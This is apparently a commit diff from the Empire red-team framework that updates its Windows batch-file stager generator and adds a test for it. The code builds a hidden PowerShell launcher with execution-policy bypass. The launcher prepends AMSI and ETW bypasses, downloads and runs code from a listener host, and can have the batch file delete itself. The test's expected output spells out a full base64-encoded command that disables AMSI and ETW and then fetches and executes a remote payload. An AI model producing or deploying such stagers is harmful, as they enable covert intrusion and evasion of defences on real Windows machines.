Updated Windows bat launcher (BC-SECURITY#670)

Cx01N · vinnybod · web-flow · commit 86af372eabf7 · 2023-08-25T15:17:51.000-04:00
* initial bat fixes

* update bat file to use base64

* formatting

* added pytest for bat files

* updated formatting and changelog

* Update empire/server/modules/powershell/management/spawnas.py

Co-authored-by: Vincent Rose &lt;vrose04@gmail.com&gt;

---------

Co-authored-by: Vincent Rose &lt;vrose04@gmail.com&gt;
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -8,6 +8,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 ## [Unreleased]
 -   Pin linters in the workflow
 
+- Updated Windows BAT launcher to use Base64 for all payloads (@Cx01N)
+
 ## [5.6.2] - 2023-08-09
 
 -   Update the github issue templates to use forms (@Vinnybod)
diff --git a/empire/server/stagers/windows/launcher_bat.py b/empire/server/stagers/windows/launcher_bat.py
@@ -2,6 +2,7 @@
 
 import logging
 from builtins import object
+from textwrap import dedent
 
 from empire.server.common.helpers import enc_powershell
 from empire.server.core.db import models
@@ -79,54 +80,61 @@ def __init__(self, mainMenu, params=[]):
                 self.options[option]["Value"] = value
 
     def generate(self):
-        # extract all of our options
-        listener_name = self.options["Listener"]["Value"]
-        delete = self.options["Delete"]["Value"]
-        obfuscate = self.options["Obfuscate"]["Value"]
-        obfuscate_command = self.options["ObfuscateCommand"]["Value"]
-        bypasses = self.options["Bypasses"]["Value"]
-        language = self.options["Language"]["Value"]
-
-        if obfuscate.lower() == "true":
+        # Extract options
+        options = self.options
+        listener_name = options["Listener"]["Value"]
+        obfuscate_command = options["ObfuscateCommand"]["Value"]
+        bypasses = options["Bypasses"]["Value"]
+        language = options["Language"]["Value"]
+
+        listener = self.mainMenu.listenersv2.get_by_name(SessionLocal(), listener_name)
+        host = listener.options["Host"]["Value"]
+
+        if options["Obfuscate"]["Value"].lower() == "true":
             obfuscate = True
         else:
             obfuscate = False
 
-        listener = self.mainMenu.listenersv2.get_by_name(SessionLocal(), listener_name)
-        host = listener.options["Host"]["Value"]
-        if host == "":
+        if options["Delete"]["Value"].lower() == "true":
+            delete = True
+        else:
+            delete = False
+
+        if not host:
             log.error("[!] Error in launcher command generation.")
             return ""
 
+        launcher = ""
         if listener.module in ["http", "http_com"]:
             if language == "powershell":
-                launcher = "powershell.exe -nol -w 1 -nop -ep bypass "
                 launcher_ps = f"(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('{host}/download/powershell/')-UseBasicParsing|iex"
 
-                if obfuscate:
-                    launcher = "powershell.exe -nol -w 1 -nop -ep bypass -enc "
-
-                    with SessionLocal.begin() as db:
-                        for bypass in bypasses.split(" "):
-                            bypass = (
-                                db.query(models.Bypass)
-                                .filter(models.Bypass.name == bypass)
-                                .first()
-                            )
-                            if bypass:
-                                if bypass.language == language:
-                                    launcher_ps = bypass.code + launcher_ps
-                                else:
-                                    log.warning(
-                                        f"Invalid bypass language: {bypass.language}"
-                                    )
-
-                    launcher_ps = self.mainMenu.obfuscationv2.obfuscate(
+                with SessionLocal.begin() as db:
+                    for bypass_name in bypasses.split(" "):
+                        bypass = (
+                            db.query(models.Bypass)
+                            .filter(models.Bypass.name == bypass_name)
+                            .first()
+                        )
+
+                        if bypass:
+                            if bypass.language == language:
+                                launcher_ps = bypass.code + launcher_ps
+                            else:
+                                log.warning(
+                                    f"Invalid bypass language: {bypass.language}"
+                                )
+
+                launcher_ps = (
+                    self.mainMenu.obfuscationv2.obfuscate(
                         launcher_ps, obfuscate_command
                     )
-                    launcher_ps = enc_powershell(launcher_ps).decode("UTF-8")
+                    if obfuscate
+                    else launcher_ps
+                )
+                launcher_ps = enc_powershell(launcher_ps).decode("UTF-8")
+                launcher = f"powershell.exe -nop -ep bypass -w 1 -enc {launcher_ps}"
 
-                launcher = launcher + launcher_ps
             else:
                 oneliner = self.mainMenu.stagers.generate_exe_oneliner(
                     language=language,
@@ -135,28 +143,35 @@ def generate(self):
                     encode=True,
                     listener_name=listener_name,
                 )
+                launcher = f"powershell.exe -nop -ep bypass -w 1 -enc {oneliner.split('-enc ')[1]}"
 
-                oneliner = oneliner.split("-enc ")[1]
-                launcher = f"powershell.exe -nol -w 1 -nop -ep bypass -enc {oneliner}"
-
-        else:
-            if language == "powershell":
-                launcher = self.mainMenu.stagers.generate_launcher(
-                    listenerName=listener_name,
-                    language="powershell",
-                    encode=True,
-                    obfuscate=obfuscate,
-                    obfuscation_command=obfuscate_command,
-                )
+        elif language == "powershell":
+            launcher = self.mainMenu.stagers.generate_launcher(
+                listenerName=listener_name,
+                language="powershell",
+                encode=True,
+                obfuscate=obfuscate,
+                obfuscation_command=obfuscate_command,
+            )
 
         if len(launcher) > 8192:
-            log.error("[!] Error launcher code is greater than 8192 characters.")
+            log.error("[!] Error: launcher code is greater than 8192 characters.")
             return ""
 
-        code = "@echo off\n"
-        code += "start " + launcher + "\n"
-        if delete.lower() == "true":
-            # code that causes the .bat to delete itself
-            code += '(goto) 2>nul & del "%~f0"\n'
+        code = dedent(
+            f"""
+            @echo off
+            start /B {launcher}
+            """
+        ).strip()
+
+        if delete:
+            code += "\n"
+            code += dedent(
+                """
+                timeout /t 1 > nul
+                del "%~f0"
+                """
+            ).strip()
 
         return code
diff --git a/empire/test/conftest.py b/empire/test/conftest.py
@@ -286,6 +286,22 @@ def base_stager_2():
     }
 
 
+@pytest.fixture(scope="function")
+def bat_stager():
+    return {
+        "name": "bat_stager",
+        "template": "windows_launcher_bat",
+        "options": {
+            "Listener": "new-listener-1",
+            "Language": "powershell",
+            "OutFile": "my-bat.bat",
+            "Obfuscate": "False",
+            "ObfuscateCommand": "Token\\All\\1",
+            "Bypasses": "mattifestation etw",
+        },
+    }
+
+
 @pytest.fixture(scope="function")
 def pyinstaller_stager():
     return {
diff --git a/empire/test/test_stager_api.py b/empire/test/test_stager_api.py
@@ -1,3 +1,5 @@
+from textwrap import dedent
+
 import pytest
 
 
@@ -410,3 +412,54 @@ def test_pyinstaller_stager_creation(client, pyinstaller_stager, admin_auth_head
     assert len(response.content) > 0
 
     client.delete(f"/api/v2/stagers/{stager_id}", headers=admin_auth_header)
+
+
+def test_bat_stager_creation(client, bat_stager, admin_auth_header):
+    response = client.post(
+        "/api/v2/stagers/?save=true", headers=admin_auth_header, json=bat_stager
+    )
+
+    # Check if the stager is successfully created
+    assert response.status_code == 201
+    assert response.json()["id"] != 0
+
+    stager_id = response.json()["id"]
+
+    response = client.get(
+        f"/api/v2/stagers/{stager_id}",
+        headers=admin_auth_header,
+    )
+
+    # Check if we can successfully retrieve the stager
+    assert response.status_code == 200
+    assert response.json()["id"] == stager_id
+
+    response = client.get(
+        response.json()["downloads"][0]["link"],
+        headers=admin_auth_header,
+    )
+
+    # Check if the file is downloaded successfully
+    assert response.status_code == 200
+    assert (
+        response.headers.get("content-type").split(";")[0]
+        == "application/x-msdos-program"
+    )
+    assert isinstance(response.content, bytes)
+
+    # Check if the downloaded file is not empty
+    assert len(response.content) > 0
+    assert response.content.decode("utf-8") == _expected_http_bat_launcher()
+
+    client.delete(f"/api/v2/stagers/{stager_id}", headers=admin_auth_header)
+
+
+def _expected_http_bat_launcher():
+    return dedent(
+        """
+        @echo off
+        start /B powershell.exe -nop -ep bypass -w 1 -enc WwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAEUAdgBlAG4AdABpAG4AZwAuAEUAdgBlAG4AdABQAHIAbwB2AGkAZABlAHIAXQAuAEcAZQB0AEYAaQBlAGwAZAAoACcAbQBfAGUAbgBhAGIAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABJAG4AcwB0AGEAbgBjAGUAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFQAcgBhAGMAaQBuAGcALgBQAFMARQB0AHcATABvAGcAUAByAG8AdgBpAGQAZQByACcAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACcAZQB0AHcAUAByAG8AdgBpAGQAZQByACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4ARwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACkALAAwACkAOwAkAFIAZQBmAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQA7ACQAUgBlAGYALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AHYAYQBsAHUAZQAoACQATgB1AGwAbAAsACQAdAByAHUAZQApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwBpAHcAcgAoACcAaAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAA6ADEAMwAzADYALwBkAG8AdwBuAGwAbwBhAGQALwBwAG8AdwBlAHIAcwBoAGUAbABsAC8AJwApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfABpAGUAeAA=
+        timeout /t 1 > nul
+        del "%~f0"
+        """
+    ).strip()
